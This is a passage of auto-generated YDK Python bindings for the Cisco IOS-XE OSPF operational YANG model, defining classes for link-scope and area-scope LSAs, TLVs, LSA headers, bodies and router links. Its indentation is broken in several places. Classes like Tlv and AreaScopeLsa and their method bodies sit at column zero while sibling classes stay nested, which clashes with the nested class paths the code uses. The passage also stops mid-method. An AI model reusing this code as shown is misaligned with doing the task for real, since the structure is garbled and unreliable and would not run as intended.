                            # Auto-generated ydk initializer for the "multi-topology" list entry.
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
                            self.yang_name = "multi-topology"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['name']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('name', (YLeaf(YType.str, 'name'), ['str'])),
                            ])
                            self.name = None
                            self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            # Restrict attribute writes to the declared YANG leafs.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
class Tlv(Entity):
"""
Link TLV
.. attribute:: link_type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_id
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_if_ipv4_addr
List of local interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: local_remote_ipv4_addr
List of remote interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: te_metric
TE metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: max_bandwidth
Maximum bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: max_reservable_bandwidth
Maximum reservable bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: unreserved_bandwidth
Unrseerved bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: admin_group
Administrative group/Resource class/Color
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Register YANG metadata and leaf defaults for the link-scope-LSA TLV node.

    Auto-generated-style binding constructor: it records the node's YANG
    identity, builds the leaf descriptor table, initializes every leaf to
    its unset value, then freezes the instance.
    """
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
    # YANG statement name of this node and of its parent container.
    self.yang_name = "tlv"
    self.yang_parent_name = "link-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # No key leafs: this node is not a keyed YANG list entry.
    self.ylist_key_names = []
    # No child containers under this node.
    self._child_classes = OrderedDict([])
    # Leaf metadata: python attribute name -> (YLeaf/YLeafList descriptor, accepted python type names).
    self._leafs = OrderedDict([
        ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
        ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
        ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
        ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
        ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
        ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
        ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
        ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
        ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
    ])
    # Scalar leafs start unset (None); leaf-lists start empty.
    self.link_type = None
    self.link_id = None
    self.local_if_ipv4_addr = []
    self.local_remote_ipv4_addr = []
    self.te_metric = None
    self.max_bandwidth = None
    self.max_reservable_bandwidth = None
    self.unreserved_bandwidth = None
    self.admin_group = None
    # XPath-style path segment for this node (no key predicate: non-keyed node).
    self._segment_path = lambda: "tlv"
    # NOTE(review): _is_frozen is consumed by the Entity base — presumably it
    # blocks creation of new attributes from here on; confirm against ydk runtime.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Funnel every attribute write through the Entity base's _perform_setattr,
    # passing the node's known leaf names for validation/bookkeeping.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
class UnknownSubTlv(Entity):
    """
    OSPFv2 Unknown sub TLV

    .. attribute:: type  (key)

        TLV type
        **type**\: int
        **range:** 0..65535
        **config**\: False

    .. attribute:: length

        TLV length
        **type**\: int
        **range:** 0..65535
        **config**\: False

    .. attribute:: value

        TLV value
        **type**\: list of int
        **range:** 0..255
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata and leaf defaults for an unknown sub-TLV entry."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "unknown-sub-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Keyed YANG list entry: 'type' is the list key.
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict([])
        # Leaf metadata: python attribute name -> (YLeaf/YLeafList descriptor, accepted python type names).
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ])
        # Scalar leafs start unset (None); the 'value' leaf-list starts empty.
        self.type = None
        self.length = None
        self.value = []
        # Path segment includes the list-key predicate built from self.type.
        self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # All attribute writes go through the Entity base's _perform_setattr
        # with this node's leaf names.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
"""
List OSPF area scope LSA databases
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Register YANG metadata, child-container bindings and leaf defaults
    for one area-scope LSA database entry (keyed by lsa-type + adv-router).
    """
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()
    # YANG statement name of this node and of its parent container.
    self.yang_name = "area-scope-lsa"
    self.yang_parent_name = "link-scope-lsas"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Keyed YANG list entry: composite key (lsa_type, adv_router).
    self.ylist_key_names = ['lsa_type','adv_router']
    # Map of YANG child names -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
    # Leaf metadata: python attribute name -> (YLeaf/YLeafList descriptor, accepted python type names).
    self._leafs = OrderedDict([
        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
        ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
        ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
        ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
    ])
    # Scalar leafs start unset; the raw-data byte leaf-list starts empty.
    self.lsa_type = None
    self.adv_router = None
    self.decoded_completed = None
    self.raw_data = []

    # Singleton child containers are instantiated eagerly and parented here.
    self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
    self.ospfv2_lsa.parent = self
    self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

    self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
    self.ospfv3_lsa.parent = self
    self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

    # List children start as empty YLists bound to this parent.
    self.ospfv2_link = YList(self)
    self.ospfv2_topology = YList(self)
    self.ospfv2_external = YList(self)
    self.ospfv3_link = YList(self)
    self.ospfv3_prefix = YList(self)
    self.ospfv3_ia_prefix = YList(self)
    # Path segment carries both list-key predicates.
    self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Funnel attribute writes through the Entity base's _perform_setattr
    # with this node's leaf names.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
    """
    OSPFv2 LSA

    .. attribute:: header

        Decoded OSPFv2 LSA header data
        **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>`
        **config**\: False

    .. attribute:: lsa_body

        Decoded OSPFv2 LSA body data
        **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>`
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata for the OSPFv2 LSA container (no leafs,
        two singleton children: header and lsa-body)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Map of YANG child names -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
        # Pure container node: no leafs of its own.
        self._leafs = OrderedDict()

        # Singleton child containers, instantiated eagerly and parented here.
        self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"

        self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv2-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # No leafs to validate; writes still go through the Entity machinery.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)


    class Header(Entity):
        """
        Decoded OSPFv2 LSA header data

        .. attribute:: lsa_id

            LSA ID
            **type**\: union of the below types:

                **type**\: str
                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                **type**\: str
                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: opaque_type

            Opaque type
            **type**\: int
            **range:** 0..255
            **config**\: False

        .. attribute:: opaque_id

            Opaque ID
            **type**\: int
            **range:** 0..4294967295
            **config**\: False

        .. attribute:: age

            LSA age
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: type

            LSA type
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: adv_router

            LSA advertising router
            **type**\: int
            **range:** 0..4294967295
            **config**\: False

        .. attribute:: seq_num

            LSA sequence number
            **type**\: str
            **config**\: False

        .. attribute:: checksum

            LSA checksum
            **type**\: str
            **config**\: False

        .. attribute:: length

            LSA length
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: flag_options

            LSA options
            **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Register YANG metadata and leaf defaults for the decoded
            OSPFv2 LSA header."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
            # YANG statement name of this node and of its parent container.
            self.yang_name = "header"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
            ])
            # Scalar leafs start unset; the bits-typed leaf gets an empty Bits value.
            self.lsa_id = None
            self.opaque_type = None
            self.opaque_id = None
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self.flag_options = Bits()
            self._segment_path = lambda: "header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Funnel attribute writes through the Entity base with this node's leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)


    class LsaBody(Entity):
        """
        Decoded OSPFv2 LSA body data

        .. attribute:: num_of_links

            Number of links
            **type**\: int
            **range:** 0..65535
            **config**\: False

        .. attribute:: network

            Network details
            **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>`
            **config**\: False

        .. attribute:: summary_mask

            Summary mask
            **type**\: union of the below types:

                **type**\: str
                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                **type**\: str
                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: external_mask

            External mask
            **type**\: union of the below types:

                **type**\: str
                **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                **type**\: str
                **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: body_flag_options

            LSA body flags
            **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
            **config**\: False

        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Register YANG metadata and leaf defaults for the decoded
            OSPFv2 LSA body (with its singleton 'network' child)."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
            # YANG statement name of this node and of its parent container.
            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Single child container: network details.
            self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
            # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
            self._leafs = OrderedDict([
                ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
            ])
            # Scalar leafs start unset; the bits-typed leaf gets an empty Bits value.
            self.num_of_links = None
            self.summary_mask = None
            self.external_mask = None
            self.body_flag_options = Bits()

            # Singleton child container, instantiated eagerly and parented here.
            self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"
            self._segment_path = lambda: "lsa-body"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Funnel attribute writes through the Entity base with this node's leaf names.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)


        class Network(Entity):
            """
            Network details

            .. attribute:: network_mask

                IP network mask
                **type**\: union of the below types:

                    **type**\: str
                    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                    **type**\: str
                    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

                **config**\: False

            .. attribute:: attached_router

                List of the routers attached to the network
                **type**\: list of int
                **range:** 0..4294967295
                **config**\: False

            """

            # YANG module prefix and revision this binding was generated from.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                """Register YANG metadata and leaf defaults for the network-LSA details."""
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                # YANG statement name of this node and of its parent container.
                self.yang_name = "network"
                self.yang_parent_name = "lsa-body"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                # Leaf metadata: python attribute name -> (YLeaf/YLeafList descriptor, accepted python type names).
                self._leafs = OrderedDict([
                    ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                    ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                ])
                # Scalar leaf starts unset; the attached-router leaf-list starts empty.
                self.network_mask = None
                self.attached_router = []
                self._segment_path = lambda: "network"
                self._is_frozen = True

            def __setattr__(self, name, value):
                # Funnel attribute writes through the Entity base with this node's leaf names.
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
    """
    Router LSA link

    .. attribute:: link_id  (key)

        Link ID
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: link_data  (key)

        Link data
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: type

        Link type
        **type**\: int
        **range:** 0..255
        **config**\: False

    .. attribute:: ospfv2_topology

        Topology specific information
        **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>`
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Register YANG metadata and leaf defaults for a router-LSA link
        entry (keyed by link-id + link-data)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
        # YANG statement name of this node and of its parent container.
        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Keyed YANG list entry: composite key (link_id, link_data).
        self.ylist_key_names = ['link_id','link_data']
        # One child list: per-topology metric information.
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
        # Leaf metadata: python attribute name -> (YLeaf descriptor, accepted python type names).
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        # Scalar leafs start unset.
        self.link_id = None
        self.link_data = None
        self.type = None

        # Child list starts as an empty YList bound to this parent.
        self.ospfv2_topology = YList(self)
        # Path segment carries both list-key predicates.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel attribute writes through the Entity base with this node's leaf names.
